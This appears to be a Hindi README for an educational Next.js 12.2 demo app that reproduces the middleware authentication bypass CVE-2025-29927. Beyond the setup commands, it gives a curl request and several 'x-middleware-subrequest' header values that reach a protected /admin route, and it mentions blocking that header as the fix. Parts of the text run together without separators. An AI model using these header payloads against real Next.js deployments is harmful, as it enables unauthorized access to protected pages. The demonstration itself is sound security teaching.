
🔓 Next.js Auth Bypass Demo - शैक्षिक एप्लिकेशन जो CVE-2025-29927 मिडलवेयर प्रमाणीकरण बाईपास भेद्यता को प्रदर्शित करता है . ⚠️ केवल शैक्षिक उपयोग के लिए .[AI का उपयोग करके बनाया गया]
Next.js 12.2 का एक सरल प्रूफ ऑफ कॉन्सेप्ट एप्लिकेशन।
npm install
npm run dev
एप्लिकेशन http://localhost:3000 पर उपलब्ध होगा।
npm run dev - डेवलपमेंट सर्वर प्रारंभ करेंnpm run build - प्रोडक्शन के लिए बिल्ड करेंnpm run start - प्रोडक्शन सर्वर प्रारंभ करेंHello World पेज को संशोधित करने के लिए pages/index.js संपादित करें। सरलता के लिए एप्लिकेशन इनलाइन स्टाइल का उपयोग करता है, लेकिन आप आवश्यकतानुसार CSS फ़ाइलें या स्टाइलिंग लाइब्रेरी जोड़ सकते हैं।
यह एप्लिकेशन CVE-2025-29927 भेद्यता को प्रदर्शित करता है, जिसे Rachid.A (zhero) और Yasser Allam (inzo_) द्वारा खोजा गया है:
x-middleware-subrequest हेडर का उपयोग करके पूर्ण मिडलवेयर बायपासadminadminx-middleware-subrequest: middleware हेडर जोड़ेंcurl -H "x-middleware-subrequest: middleware" http://localhost:3000/adminx-middleware-subrequest: middlewarex-middleware-subrequest: src/middlewarex-middleware-subrequest: middleware:middleware:middleware:middleware:middlewarex-middleware-subrequest हेडर को ब्लॉक करें⚠️ चेतावनी: यह केवल शैक्षिक उद्देश्यों के लिए एक वास्तविक CVE प्रदर्शित करता है!
यह एप्लिकेशन सरलता के लिए इनलाइन स्टाइल का उपयोग करता है। प्रोडक्शन ऐप के लिए, निम्न का उपयोग करने पर विचार करें:
हैप्पी कोडिंग! 🚀